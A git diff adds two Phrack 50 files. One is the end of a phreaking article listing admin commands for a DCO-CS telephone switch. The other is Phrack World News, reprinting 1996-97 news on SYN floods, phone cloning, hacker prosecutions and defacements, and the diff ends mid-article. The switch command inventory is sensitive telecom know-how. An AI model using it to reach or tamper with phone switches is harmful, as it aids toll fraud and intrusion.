+MOVEDB    -   DCO-CS database compress program
+MSKUTL    -   temporarily mask alarm and message reporting
+NITSWC    -   initiate service circuit switchover
+OCC       -   DCO-CS administer system options
+OPR       -   administer system operator groups
+PABX      -   administer PABX groups
+PARTN     -   DCO-CS administer partition number tables
+PASSWM    -   administer user/password list
+PATCH     -   MP operating system patcher
+PATRPT    -   format patch into report
+PAUDIT    -   audit patches applied to disk/system
+PCOS      -   DCO-CS administer partition class of service
+PED       -   administer/apply/verify patches to disk/system
+POORA     -   point of origination for recorded announcements
+PORTST    -   list port status; list/change lockout thresholds
+PSAUTL    -   port store area (PSA) utility
+REBOOT    -   reboots the maintenance processor
+RECOV     -   put call processors in sync
+REMOVE    -   remove a resident program from memory
+RESTOR    -   restore call processor
+RFRNS     -   copy files from an RNS to the host office
+RGU       -   DCO-CS least cost routing/update display
+RNSAMA    -   display AMA buffer status in an RNS at the host
+RNSBMP    -   display RNS BMP status at the host
+RNSUTL    -   configure/status/diagnostic testing of signaling links
+ROTL      -   transmission/operational testing of outgoing & 2-way trunks
+ROUTE     -   DCO-CS display customer routing
+RRTUTL    -   reroute messages to additional terminal points
+RSMUTL    -   remove/restore/mask/unmask/test RLG span
+RSUTL     -   routine switchover utility
+RTEST     -   routine testing
+RTOPT     -   administer analog trunks and service circuits
+RTR       -   administer route treatment database
+SBUG      -   stop FBUG
+SCTST     -   DCO-CS service circuit diagnostics
+SECTTY    -   administer terminal access groups
+SELMCL    -   outgoing call trace
+SELNUM    -   DCO-CS administer blocked directory tables
+SERV      -   DCO-CS change service circuit tables
+SLUUTL    -   configure/administer/mask/test SLUS
+SNCUTL    -   configure/status of SNC for LLS & RLS-1000
+SPCALL    -   DCO-CS administer speed codes
+STASND    -   digital alarm sending utility
+STATE     -   display system state
+STATE1    -   switch to system state 1
+STATE2    -   switch to system state 2
+STATUS    -   display system status
+STOP      -   terminate execution of TEST, GBUG, DIAG2, or BTBT
+SWITCH    -   manually switch tones/ringing generators/clocks (non RLS-4000)
+TAPE      -   display formatted tickets on AMA tape
+TASKCK    -   audits the disk database for necessary/unnecessary files
+TCOS      -   administer trunk class of service
+TFM       -   activate/deactive/audit/display TMRS
+TFMRP     -   display specific TMRS measurements/report data/study set
+TIKFM     -   DCO-CS display AMA tape format
+TIME      -   display system date/time
+TIMEC     -   changes system date/time
+TIMER     -   administer/configure CP occupancy measurements
+TKTHRS    -   administer trunk thresholds
+TMAD      -   administer/configure TMRS
+TMBUG     -   debugger for traffic measurement processor
+TMPDMP    -   display data collected from a TMP crash
+TMRPRT    -   manually display a TMRS variable report (with FP)
+TRACE     -   DCO-CS call trace utility
+TRACER    -   allows use of tracer board for CP
+TRK       -   administer trunk group assignments
+TRKUTL    -   administer trunk testing database
+TSEP      -   administer/configure traffic separations
+TTU       -   administer translation database
+UNMASK    -   enable reporting of messages & H/W faults (non-RLS-4000)
+UNSYNC    -   take call processors out of sync
+UPACK     -   unpack a file
+UPDATE    -   update the system state
+UTL       -   mount/dismount device/feature; configure tasks
+VALPC     -   DCO-CS administer validated project codes
+VCHECK    -   version checker
+VST       -   administer variable state timers
+XDSO      -   CP message sender/debugger
+XFER      -   transfer files between the DCO and another system
+XRTEST    -   terminate routine testing
+
+        Thats all for the commands... I will probably write a follow-up
+explaining some of the commands usage, what a DCO looks like when you call it
+(ie how you know its a DCO machine), what some defaults are, how to route
+numbers using INWATS or INWANI, and whatever else i figure out... for now,
+have phun & read Phrack...  Feel free to contact me:
+    
+                            mrnobody@pil.net
+
+resources i used:
+
+- an actual RLS machine running DCO siemens stromberg-carlson
+
+- my mind 
+- the minds of my phriends, to whom i give much thanks: 
+    c-stone (is thatit?), lefty, port9, cyklonik (hope everything turns out 
+    OK....), a guy named don in CA :), and ben (look at me now, m0f0)
+
+sorry if i forgot anything or anyone that helped me... 
+look out for "The DCO-CS part 2" soon...
+
+EOF
+
diff --git a/phrack50/15.txt b/phrack50/15.txt
new file mode 100644
index 0000000..b301dfc
--- /dev/null
+++ b/phrack50/15.txt
@@ -0,0 +1,2614 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     15 of 16
+ 
+
+              PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN        Compiled by disorder/alhambra        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Intro: As usual there are literally hundreds of interesting articles
+       that could be put here. I have tried to narrow the focus to
+       hacker/security related stuff only. Enjoy.
+
+Sources: Access All Areas mail list:
+                echo "help" | mail majordomo@access.org.uk
+         CSP (run by Frosty):
+
+         Computer Underground Digest:
+                echo "subscribe cu-digest" | mail cu-digest-request@weber.ucsd.edu
+         Cyberwire Dispatch:
+                echo "subscribe" | mail cwd-l-request@cyberwerks.com
+         Defcon Stuff:
+                echo "subscribe" | mail majordomo@dis.org
+         Half a dozen other mail lists, elite people who forward me
+                neat shit, and various news type web pages.
+
+
+Phrack World News #50 -- Index
+
+01. Computer Attack Slows Service at New York Times' Web Site
+02. [Chinese Hacker Convicted]
+03. Phone 'Super Scanner' Alert
+04. Computer Hacking Whiz Pleads Guilty To Electronic Break-And-Enter
+05. Hackers release two upcoming U2 songs on Internet
+06. Computer Crime Prompts New Parole Restrictions
+07. [Evil Hacker SYN-Flood's WebCom]
+08. German Police Seek 12 After Raids On Computer Gang
+09. The tale of the Russian Hacker
+10. Expert Warns Of Lax Security On Web
+11. [Man pleads guilty to writing AOL hacking soft]
+12. Hackers Hack Crack, Steal Quake
+13. Hackers Sabotage Blair's Internet Image
+14. Police looking into hacking of Government web site
+15. Programmer Accused Of Breaking Into California State Contract Data
+16. [Australian Phone Worker Rigs Radio Contest]
+17. Hacker challenges `dark side' book
+
+01. The 1997 Summer Security Conference
+02. Hacking In Progress 
+03. Defensive Information Warfare And Systems Assurance
+04. Second International Workshop on Enterprise Security
+05. DEF CON V Convention Announcement #1.00 (02.26.97)
+
+[=-------------------------------------------------------------------------=]
+
+title: Computer Attack Slows Service at New York Times' Web Site
+author:
+source: The Wall Street Journal Interactive Edition
+date: November 7, 1996
+
+   Numerous World Wide Web sites offering political information found
+themselves overwhelmed by requests for election information from Tuesday
+night. But the New York Times' Web site also had to deal with waves of
+requests for access apparently generated by a computer hacker.
+
+   Nancy Nielsen, a New York Times Co. spokeswoman, noted that the attacks
+-- which continued Wednesday -- only slowed the Times' computers, which
+were still able to serve a record number of users on Tuesday.
+
+   The attack was similar to a September incident that virtually paralyzed
+Public Access Networks Corp., or Panix, an Internet-access provider that
+hosts nearly a thousand corporate Web sites. In that incident, a computer
+hacker bombarded the service's computers with requests to send information.
+
+   Such attacks, presumably generated by malicious computer programs, work
+by sending repeated requests -- sometimes more than a hundred per second --
+seeking to establish a connection to send or receive information. The
+requests contain fake Internet addresses, which the site's computers waste
+valuable resources attempting to establish contact with. This process
+prevents the computers from handling legitimate requests from Internet
+users for access.
+
+   Such attacks are, in effect, similar to campaigns used by some activist
+groups to flood a politician's switchboard with phone calls. So much time
+is spent sorting out the bogus calls -- in this case, the hacker's false
+requests for an electronic "handshake" with a site's machines -- that the
+legitimate ones can't get through. The attacks can be differentiated from
+heavy volume on a site because of the fake Internet addresses and the
+regularity with which such requests come in.
+
+   Attacks such as the ones directed at Panix and the New York Times
+underscore a key vulnerability of the Internet.
+
+   "This is the first major attack of a kind that I believe to be the final
+Internet security problem," said William Cheswick, an Internet security
+expert at the Bell Laboratories unit of Lucent Technologies Inc., in the
+wake of the attack on Panix.
+
+   Mr. Cheswick, who assisted Panix during the attacks, said at the time
+that while there had been a few previous reports of such incidents, the
+Panix episode was the most severe.
+
+   Internet computers have no quick way of distinguishing a bogus request
+for information from a real one, Mr. Cheswick noted. While upgrades to the
+software controlling these computers could ease the problem, hackers could
+respond with even more intensive attacks.
+
+   "There's going to be the usual arms race" between better security
+measures and hackers, Mr. Cheswick predicts.
+
+   Panix tried to find the source of the attack by working backward through
+the labyrinthine network of phone lines and specialized "router" computers
+that form the Internet. But there is no easy way to trace such hackers, Mr.
+Cheswick noted.
+
+[=-------------------------------------------------------------------------=]
+
+title: (none) [Chinese Hacker Convicted]
+author: Magdalen Chow
+source: South China Morning Post
+
+Computer hacker who enjoyed free access to the Internet by using other
+people's accounts was fined HK$125,000 (about US$16,000) in Hong Kong
+Monday.
+
+Judge Gareth Lugar-Mawson also ordered David Yip Shu-chew, 27, to pay
+HK$40,400 in compensation to Hong Kong Star Internet Ltd. and HK$404
+to one of the people whose accounts he had used.
+
+The judge said he would not order Yip to pay the costs of approximately
+HK$2.6 million incurred in the prosecution and investigation of the case,
+but threatened him with jail if he misused the Internet again.
+
+Yip is the first person to be charged with accessing a computer with
+criminal or dishonest intent under the Crimes Ordinance.
+
+
+[=-------------------------------------------------------------------------=]
+
+title: Phone 'Super Scanner' Alert
+source: The London Telegraph
+date: 12th November 1996
+
+
+Cellphone fraud, which already costs the British cellphone industry 200
+million a year, is increasing because of a new device that makes it
+easier than ever for criminals to "clone" phones, writes Aisling
+Irwin.
+
+The new "super-scanner" can soak up all the identification numbers of
+vulnerable analogue phones within half a mile. Each phone contains two
+numbers: its phone number and a secret verification code. When a call is
+made, the phone transmits the two numbers to the nearest of a network of
+base stations, which checks that the phone is legitimate before allowing
+the call to go ahead.
+
+Normally, thieves pick up the numbers as they are transmitted at the
+beginning of each call. Until now, such thefts have been possible only
+when victims are making calls - and stealing numbers has taken much
+longer.
+
+But the new technique, which is far more powerful, only requires mobile
+phones to be switched on to obtain their identification numbers.
+
+By sending out a signal identical to that of a real base station, the
+super-scanner gets the cellphones to yield their numbers. These are
+received by the scanner, passed to a computer and can then be programmed
+into stolen phones.
+
+According to the Federation of Communication Services, which represents
+leading cellphone companies, the new technology has evolved over the
+past few months. "Its impact is really being felt heavily," said a
+spokesman. The FCS has launched a campaign to make the advertising,
+sale, ownership or use of cloning equipment illegal.
+
+Although the FCS says the technique cannot be used to clone digital
+phones, New Scientist reported last week that criminals may be close to
+cloning these as well. If so, the problem will be magnified because
+these can be used abroad.
+
+[=-------------------------------------------------------------------------=]
+
+title: Computer Hacking Whiz Pleads Guilty To Electronic Break-And-Enter
+
+
+ST. LOUIS (Nov 15, 1996 11:12 a.m. EST) -- A computer whiz deemed so
+cunning he could control almost any computer system has accepted a plea
+bargain for hacking his way into the secret files of two major
+communications companies.
+
+Christopher Schanot, 20, was linked to the Internet Liberation Front, a
+group of hackers who have claimed responsibility for some high-profile
+computer pranks and who decry the commercialization of cyberspace.
+
+In exchange for a reduced sentence, Schanot pleaded guilty Thursday to
+two counts of computer fraud and one count of illegal wiretapping. He
+faces up to 15 years in prison and $750,000 in fines at his sentencing
+on Jan. 31.
+
+Prosecutors said Schanot broke into national computer networks and had
+passwords to military computers, the credit reporting service TRW and
+the phone company Sprint. They gave no indication he tried to profit
+from his intrusion.
+
+His hacking caused security breaches that companies said cost tens of
+thousands of dollars to repair.
+
+The break-ins took place between October 1994 and April 1995, when
+Schanot was an honor student at a Catholic boys' school in suburban St.
+Louis. He vanished after graduating in May 1995.
+
+Authorities caught up with Schanot last March and arrested him at the
+suburban Philadelphia apartment he shared with a 37-year-old woman,
+Netta Gilboa, the publisher of Gray Areas. The magazine professes to
+explore subject matter that is "illegal, immoral and/or controversial."
+
+In April, Schanot was placed under 24-hour house arrest and ordered to
+not even talk about computers.
+
+Originally accused in a five-count indictment, he pleaded guilty to
+charges surrounding break-ins at Southwestern Bell and Bellcore, a
+communications research company owned by seven regional telephone
+companies.
+
+Mike Schanot said his son made the plea bargain only after prosecutors
+threatened him with a wider range of charges.
+
+[dis: You can find a wide variety of other article on Schanot. Check
+      your favorite search engine to find them.]
+
+[=-------------------------------------------------------------------------=]
+
+title: Hackers release two upcoming U2 songs on Internet
+source: The Associated Press
+
+
+LONDON - Hackers have distributed two unreleased U2 songs on the Internet,
+possibly after tapping into computers at the Irish rock group's recording
+studio, the Sunday Times said. 
+
+The songs, Discotheque and Wake Up Dead Man, have appeared on Internet sites in
+at least four countries, the newspaper said. The songs are to appear on an album
+scheduled for release in the spring. 
+
+Since their illicit appearance on the Internet, the songs have also been copied
+onto compact discs, the Times said. The bootleg CDs are going for $10 at street
+markets in Ireland and Britain. 
+
+"It is an infringement of our copyright," Marc Marot, managing director of
+Island Records, told the Times. 
+
+Island Records did not immediately return calls for comment Sunday. The Sunday
+Times said the record company is trying to shut down the Internet sites. 
+
+Conventional, low-tech theft of the songs has been ruled out, the newspaper
+said. 
+
+Band managers are investigating the possibility that hackers tapped into
+computers at U2's Dublin studio, it said. They may have gained access through
+cables that have been feeding images of the band's recording sessions to an
+Internet site maintained by Island Records. 
+
+Since 1981, U2 has sold 70 million records and grossed more than $1.5 billion. 
+
+
+[=-------------------------------------------------------------------------=]
+
+title: Computer Crime Prompts New Parole Restrictions
+
+WASHINGTON (Dec 17, 1996 07:42 a.m. EST) -- The U.S. Parole Commission
+has approved restrictions on the use of computers by certain high-risk
+parolees.
+
+The Justice Department announced Monday that the panel voted this month
+to authorize such restrictions as requiring certain parolees to get
+prior written approval from the commission before using an Internet
+service provider, computerized bulletin board system or any public or
+private computer network.
+
+Other restrictions would: prohibit particular parolees from possessing
+or using data encryption programs, require some parolees to agree to
+unannounced inspection of computers by probation officers, require some
+parolees to compile daily logs of computer use or to pay for equipment
+to monitor their computer use.
+
+"Unrestricted access to the Internet and other computer online services
+can provide sophisticated offenders with new opportunities for crime and
+criminal associations," said Edward F. Reilly Jr., commission chairman.
+"We cannot ignore the possibility that such offenders may be tempted to
+use computer services to repeat their crimes."
+
+The commission noted a surge in "how-to" information on child
+molestation, hate crime and the illegal use of explosives available on
+the Internet and on computer online services.
+
+[=-------------------------------------------------------------------------=]
+
+title: (none) [Evil Hacker SYN-Flood's WebCom]
+
+SAN FRANCISCO - The FBI says it is investigating charges that sabotage
+caused a 40-hour outage last weekend on Web Communications, (WebCom) a
+Silicon Valley service hosting 3,000 World Wide Web sites.
+  
+WebCom said it believes a hacker using a college computer network in
+British, Columbia, Canada, flooded its server in San Jose with
+requests for connections from phony addresses. It said the attack
+ended Sunday after MCI Net, a unit of MCI Communications, blocked
+telephone traffic between WebCom and CA-Net of Canada at the request
+of WebCom and its local service provider.
+  
+WebCom Executive Vice President Thomas Leavitt said the sites the
+company hosts were unreachable much of Saturday Dec. 14 and Sunday
+Dec. 15, causing customers, some of who operate retail sites, to
+suffer "extensive" damages,
+  
+"One customer said he lost about $20,000 in revenue due to a special
+event that was not able to occur. Others said they lost business on
+one of the busiest shopping weekends of the year," Leavitt said.
+ 
+WebCom said the incident was due to a common type of Internet sabotage
+known as "denial of service" or "SYN flood," in which a computer
+hacker jams a server with requests for connections from addresses that
+do not exist. These types of attacks are easy to carry out and hard to
+trace, Leavitt said.
+  
+"You can fake where the messages are coming from," Leavitt said, and
+almost any with access to the Internet and some technical
+sophistication can do it.
+  
+Others in the industry have experienced similar attacks, WebCom said.
+Public Access Networks of New York City experienced a SYN flood attack
+in September.
+  
+WebCom, headquartered in Santa Cruz, said its own investigation helped
+by three Internet service providers traced the origin of the flooding
+message to a computer on a college network in British Columbia linked
+to BC-Net, a local Internet service provider there.
+  
+Leavitt said that a network administrator at Malaspina
+University-College in Nanaimo, British Columbia, has identified the
+computer used for the sabotage and that it was broken into by someone
+without authorized access to that computer or to the college network.
+The individual has not been identified.
+  
+FBI spokesman George Grotz said that the FBI is working with the
+information tracing the requests for connection to British Columbia
+but noted the actual perpetrator may nothing to do with the college or
+BC-Net. "BC-Net may just be another link in the case," he said.
+  
+The FBI has jurisdiction over such cases under Title 18 section 1030,
+which deals with falsely perpetrating denial of service on a computer
+network.
+  
+Leavitt said if the industry, or specifically Internet service
+providers, adopt certain "source filtering" coding they can prevent
+people from using one network to send messages that appear to come
+from somewhere else.
+  
+The U.S. Department of Energy's Computer Incident Advisory Capability
+has an advisory warning about SYN Floods.
+ 
+
+[=-------------------------------------------------------------------------=]
+
+title: German Police Seek 12 After Raids On Computer Gang
+
+MUNICH, Germany (Nov 28, 1996 3:36 p.m. EST) - European police are
+seeking 12 members of an international computer chip counterfeiting gang
+that was smashed this week in Germany and nine other countries, Bavarian
+law officials said Thursday.
+
+The raids, part of an operation code-named "Goldfish," resulted in the
+arrest of 12 others suspected of selling counterfeit Pentium chips and
+pirated software programs as well as fraud, money-laundering and tax
+evasion, Bavarian prosecutor Hubert Vollmann told a news conference.
+
+Police did not release the names of the suspects.
+
+The highly-organized ring specialized in smuggling old Intel Corp
+Pentium chips into Europe and selling them as new, Vollmann said. It
+also sold illegal copies of Microsoft Corp programs and counterfeit
+Hercules graphics adapters, he said.
+
+Vollmann said the ring caused damages of several millions of dollars in
+lost sales.
+
+Tuesday and Wednesday, more than 2,000 law enforcement officals
+confiscated "truckloads" of files, computer disks and equipment in
+Germany, France, Italy and Belgium, he said.
+
+The raids centered on offices and apartments near Munich in southern
+Germany, and in the state of North Rhine-Westphalia, Vollmann said.
+
+Three Germans and five Asians were arrested in Germany. Four other
+arrests were made in France.
+
+The raids were the culmination of a three-year probe that began when a
+Laotian businessman reported he was robbed of almost $20,000 in 1993. He
+came under suspicion after two of his attackers told police they had
+robbed him of 500,000 marks.
+
+A series of unusually large bank transactions by the man's companies led
+to an investigation into tax evasion and money laundering, police said.
+
+In addition to the 12 individuals under arrest and the 12 still at
+large, 16 others were arrested in the raids on charges unrelated to chip
+counterfeiting, Vollmann said.
+
+The chip counterfeiting ring operated a multi-tiered organization that
+bought used 133-megahertz Pentium chips in Asia and retouched them in
+Hong Kong to look like new 166- megahertz processors, Vollmann said.
+
+The group shipped the chips to Europe by courier to avoid customs and
+taxes, and sold them to personal computer companies, he said.
+
+[=-------------------------------------------------------------------------=]
+
+title: The tale of the Russian Hacker
+
+Everyone wants to know how Vladimir Levin did it, writes Hugo Cornwall.
+In mid-1994, as a 26-year-old computer scientist in St Petersburg, he is 
+supposed to have led a gang that hacked into Citibank in New Jersey, and 
+organised more than 40 wire transfers from customer accounts. Russia's 
+Mafia is said to have been involved.
+
+Levin is still denying his involvement and, for the past 21 months, he 
+has been in prison in south London, fighting extradition. On Sunday, he 
+speaks for the first time to Channel 4's Equinox programme.
+
+Could Levin really be living proof of the "professional hacker" so often 
+celebrated in movies, books and lurid conference presentations? Is he 
+a product of a KGB school of super hackers now turned loose on the 
+world as part of Russian criminal enterprise? If that turned out to be 
+true, it would delight the information warriors, the cyber-SWAT teams 
+set up by the US armed forces whose most recent claims on federal 
+budgets have been on the basis of threats to the global information 
+infrastructure. Equally pleased will be the platoons of consultants, 
+the sales forces of computer companies and the organisers of high-
+price exclusive conferences.
+
+Equinox tells a different story. The programme's researchers found a 
+Russian "recreational" hacker group called Megazoid. The Citibank fraud 
+because a group of hackers worldwide compiled files on the VAX/VMS 
+operating system, and some Russian hackers found a Citibank computer 
+with which they could play and use as a free jumping-off point to 
+other computers. One of them says that, for $100, he sold details to 
+Levin and his friends who ran a computer import/export business. In 
+reality Levin appears to have been an average-ability programmer 
+with entrepreneurial ambitions.
+
+The Citibank fraud was possible only because of a number of coincidences - 
+poor security management, a group of Russian hackers getting lucky 
+and their information falling into the hands entreprenurs with the 
+right connections. This is the pattern of much computer crime.
+
+
+[=-------------------------------------------------------------------------=]
+
+title: Expert Warns Of Lax Security On Web
+  
+SAN FRANCISCO - An outspoken computer security expert, citing his
+just-completed study, says up to two-thirds of certain Web sites,
+including reputable institutions like banks and the media, are
+vulnerable to hacker attacks.
+  
+Dan Farmer -- who stirred controversy in 1995 as co-author of software
+dubbed SATAN that enables people with basic skills to infiltrate
+computer systems -- surveyed more than 2,200 Web sites.
+  
+The survey released last week covered a relatively small portion of
+the sprawling Web but focused on sites where security is more of a
+concern.
+  
+Farmer probed 660 bank sites around the globe, 312 North American
+online newspaper sites, 274 credit union sites, 47 U.S. federal
+government sites and 451 Internet sex clubs.
+  
+In a summary, Farmer said that, out of his sample of about 1,700 Web
+sites he selected, "over 60 percent could be broken into or
+destroyed." As a control, he probed a random sample of 469 sites.
+  
+Farmer said he used relatively crude, non-intrusive methods and did
+not actually break into the sites. He also said he would not publish
+the names of the sites he surveyed.
+  
+"I barely electronically breathed on these (computer) hosts," he said
+in his report, adding that, considering more intrusive tests, some 70
+percent to 80 percent of sites may have security flaws.
+ 
+Other computer security experts found Farmer's results credible and
+authoritative, David Kennedy, director of research, education and
+consulting at the National Computer Security Association, said in a
+telephone interview.
+  
+Experts and computer industry executives said the study shed more
+light on a problem well known within the industry but insufficiently
+understood by the public at large.
+  
+The threat of hacker attacks was highlighted earlier this year when
+intruders broke into the Justice Department and Central Intelligence
+Agency Web sites and altered them, prompting the CIA to close its site
+temporarily.
+  
+Farmer stressed that Web sites are being used primarily for marketing
+and advertising purposes and that, although some bank sites may allow
+visitors to look up balances, the sites do not provide access to
+internal financial systems.
+  
+Deborah Triant, president of CheckPoint Software Technologies' U.S.
+operating unit in Redwood City, Calif., said banks routinely keep Web
+sites on separate computer systems.
+  
+"Our experience is the banks are so paranoid that they won't even
+allow the access that they should be able to allow and would be quite
+safe if you had a modern firewall" protecting their networks from
+intruders, said Triant, whose company is the market leader in firewall
+technology.
+  
+"So, if their Web site is vulnerable, that doesn't mean that anything
+else at the bank is vulnerable, or that their customers' accounts or
+the transactions their customers are doing are vulnerable," she said.
+ 
+Nevertheless, with the advent of electronic commerce over the Internet
+expected to gain momentum in 1997, lax security remains a critical
+issue, experts said.
+ 
+Farmer separated security flaws into two categories -- a red category
+where he said a site was "essentially wide open to any potential
+attacker" and a yellow category deemed less serious but with potential
+for disastrous consequences.
+  
+Of the 660 bank sites, 68 percent were deemed vulnerable and nearly 36
+percent were in the red category.
+  
+Some 51 percent of credit unions were vulnerable, 62 percent of the
+federal sites, nearly 70 percent of newspapers and 66 percent of sex
+clubs. Sites in the red category ranged from 20 percent for credit
+unions to 38 percent for federal sites and 39 percent for online
+newspapers.
+  
+Of the random sample of 469 Web sites used as the control, a far
+smaller percentage -- 33 percent -- were found to be vulnerable, and
+17 percent of the group was in the red category.
+  
+Farmer said part of the problem is that Web sites are trying to do too
+much at once, increasing their complexity and making security far more
+difficult to achieve.
+  
+But, even with security concerns, credit card transactions over the
+Net are much safer than those carried out in shopping malls, said the
+security association's Kennedy.
+  
+Farmer also said he plans to incorporate some newer testing tools into
+a new version of SATAN, which stands for Security Administrator Tool
+for Analyzing Networks, early next year.
+  
+The program enables people who manage corporate networks to locate
+weaknesses and fix them. But it has been controversial because it can
+also easily be used by malevolent intruders trying to cause damage.
+  
+Triant said there have been no reported security breaches at any of
+the more than 15,000 institutions with CheckPoint network security
+installed and said such precautions should provide adequate
+protection.
+ 
+[=-------------------------------------------------------------------------=]
+
+title: (none) [Man pleads guilty to writing AOL hacking soft]
+source: Reuters World ReportJanuary 8, 1997 14:55:00
+ 
+ 
+     WASHINGTON, Jan 8 (Reuter) - A Yale University student pleaded guilty
+Wednesday to committing computer fraud for developing a programme that
+allowed him to use America Online Inc. without paying, the Justice Department
+said.
+     Prosecutors said Nicholas Ryan, 20 of Victor, New York, entered the
+guilty plea at a federal court hearing in Alexandria, Virginia. He faces
+up to five years in prison and a $250,000 fine at sentencing, scheduled at
+the end of March. 
+     Prosecutors said Ryan in June 1995 developed the programme, called
+"AOL4FREE," and frequently used it through December 1995, avoiding having
+to pay the firm's rate of $2.95 per hour.
+     Ryan, who identified himself as "Happy Hardcore," also made the
+programme available to other America Online users, and it circulated within
+AOL chat rooms, prosecutors said. 
+     As the company made changes to stop the use of the programme, Ryan
+modified it and made the updated version available to other online service
+users, the prosecutors said.
+     They said the heaviest use of the programme took place from September
+through December 1995. America Online estimated that on a single day
+individuals using the programme logged onto the system about 2,000 times,
+the prosecutors said. 
+     The case was brought by the U.S. Attorney's office and the Justice
+Department's computer crime section.
+
+
+[=-------------------------------------------------------------------------=]
+
+title: Hackers Hack Crack, Steal Quake
+author: Annaliza Savage 
+
+8:00 pm PST - Hackers broke into the Web server and file server of Crack dot
+Com, a Texas gaming company, on Wednesday, stealing the source code for
+id's Quake 1.01, as well as Crack's newest project, Golgatha, and older games
+Abuse and Mac Abuse. 
+
+Although the hackers left a trail that may make them easy to track, the
+theft did its damage. "Quake's raw engine market value dropped several
+hundred thousand dollars," said Dave Taylor, who formed Crack dot Com
+after leaving id Software, where he worked on Doom and Quake. But Barrett
+Alexander of id denies that the financial loss will be so great, saying
+that the code for Quake's unique engine is recognizable, making it hard
+for anyone to be able to use without id's knowledge. 
+
+Crack dot Com is also worried that its unreleased techniques, developed for
+Golgotha, could make their way into the hands of other game competitors, who
+could copy bits of code into their own software. 
+
+The hackers, who were able to get through the Crack's firewall, left intact a
+bash-history file that recorded all their movements. They even logged onto
+IRC's #quake to brag about their exploits, and made Quake's source available
+on Crack dot Com's homepage (it is no longer there). 
+
+The hackers, who identified themselves as being from the group FEH,
+probably broke through Crack's firewall through their Web site. The former
+editor of the now defunct hacker magazine FEH denies any knowledge of the
+event, and has already posted a disclaimer.
+
+[=-------------------------------------------------------------------------=]
+
+title: Hackers Sabotage Blair's Internet Image
+author: Robert Uhlig, Technology Correspondent
+source: The Telegraph
+date: 10th December 1996
+
+
+The Labour Party has called for a police inquiry after computer hackers
+made repeated attacks on its Internet site, replacing a picture of Tony
+Blair with his Spitting Image puppet and headlining the site with "New
+Labour - Same Politicians. Same Lies". 
+
+A group of British hackers, calling itself the Digital Anarchists,
+infiltrated the Labour publicity site for the second time yesterday and
+said it would continue to attack the Labour Web site this week. "We're
+going to keep doing it again and again until further notice. And we're
+going to hit some other sites as well," a spokesman for the group said
+last night.
+
+The hackers later infiltrated the Labour site a third time, while
+computer experts were attempting to rectify the second attack. The Web
+site has now been closed until future notice to prevent more further
+embarrassing alterations of its content.
+
+It is believed that the hackers will attack other political parties
+including the Conservatives, Liberal Democrats, Scottish National Party
+and Plaid Cymru. Internet sites belonging to other public organisations,
+blue-chip companies and newspapers may also be affected.
+
+The first attack, which promised free drugs and beer to young voters,
+was made on Saturday while the British hacker community was staging a
+Christmas party in Manchester.
+
+The Labour leader's response to the Budget was replaced with a live sex
+show of women wearing the "demon eyes" masks seen in the Tory
+advertising campaign. The hackers also changed the title "The road to
+the Manifesto" to "The road to nowhere" and altered links to other parts
+of the site so they read "The Labour Party sex shop".
+
+
+[=-------------------------------------------------------------------------=]
+
+title: Police looking into hacking of Government web site
+author: Adeline Goh
+source: The Straits Times
+date: Dec 10 1996
+
+
+POLICE are investigating how the Singapore government's Web site on the
+Internet was modified without authorisation. 
+
+In the incident on Sunday, someone replaced the site's contents with a
+list of more than 100 user identities (IDs) of people from various
+government bodies. 
+
+Yesterday, the Commercial Crime Division (CCD) of the Criminal
+Investigation Department told The Straits Times that three officers from
+its computer crime team had started work on the case. 
+
+It added that the first step would be to trace the identity of the hacker
+by checking the log files of the computer in which the Web site is housed. 
+
+These log files keep track of people who access it.
+
+The web site -- at http://www.gov.sg -- is the on-line version of the
+Singapore Government directory and has links to the Web sites of various
+bodies such as the ministries. 
+
+The original contents of the site were restored by the National Computer
+Board (NCB) on Sunday afternoon. When contacted yesterday, NCB, which
+maintains the computer that houses the Web site, said that the hackers did
+not gain access to any government networks which contain sensitive data. 
+
+It added that the computer where the Web site was stored did not contain
+sensitive information. 
+
+It declined to give further details about the incident, saying that it had
+referred the matter to the CCD. 
+
+Several computer experts contacted yesterday said that electronic networks
+could be broken into with special computer programs. 
+
+They are placed into a network by hackers and they capture a user's log-in
+password, which can then be retrieved. 
+
+Those contacted added that passwords which are proper English words were
+easy for hackers to crack. 
+
+This is because there are also programs which try to log on by trying
+words found in English dictionaries. 
+
+One of the experts, Mr A. I. Chow, 32, a partner in a computer firm, said
+perpetrators could even impersonate computer system administrators and ask
+a particular user on the network to change his password to one supplied by
+them. "When the user changes his password, the hacker can then access the
+network easily with the user's account." 
+
+Those contacted said data on Internet computers could be made more secure
+if system administrators allowed Web pages to be updated only during
+certain times or from computers within an organisation. 
+
+Security could also be improved, they said, if passwords were generated
+randomly and refreshed constantly. 
+
+[=-------------------------------------------------------------------------=]
+
+title: Computer Programmer Accused Of Breaking Into California
+       State Contract Data
+
+SACRAMENTO, Calif. (Jan 17, 1997 00:36 a.m. EST) -- The Bay Area
+computer programmer who was arrested for hacking into the state
+Department of Information Technology computer system tapped into
+confidential information dealing with nearly a half million dollars
+worth of government contracts, court records show.
+
+David Ernesto Salas of Alameda, who faces four years in prison,
+allegedly told others he had obtained confidential communication between
+a contractor and department officials and he was going to use it in a
+lawsuit against the department, said documents on file in Sacramento
+Superior Court.
+
+Salas, 34, who is free on $50,000 bail, was arraigned Tuesday in
+Sacramento on three felony counts of computer hacking, including one
+count which alleges he attempted to destroy the department's computer
+system after his hacking was discovered.
+
+Although some data was lost in the crash and the department's computer
+system was down for two days in September, nearly everything has been
+re-created by a backup computer system. Damage was estimated about
+$10,000, officials said.
+
+The incident, however, has been an embarrassment to department officials
+and is viewed with concern because Information Technology oversees $2.2
+billion in computer projects throughout state government.
+
+The department was established last year after a series of audits and
+investigations showed that millions in public funds were wasted on
+bungled state computer projects.
+
+Kenneth Keller, Salas's San Francisco attorney, has said his client, who
+was a subcontractor hired to develop and install the department's
+computer system, will eventually be vindicated.
+
+Keller, who couldn't be reached for comment Thursday, said last week
+that Salas had permission to be using the computer.
+
+But according to court documents, Salas lost his authority to access the
+computer when he lost his contract after a dispute with another
+contractor in August. Beginning shortly before 11 p.m. Sept. 25 and into
+the following day, Salas gained access to the department's computer. To
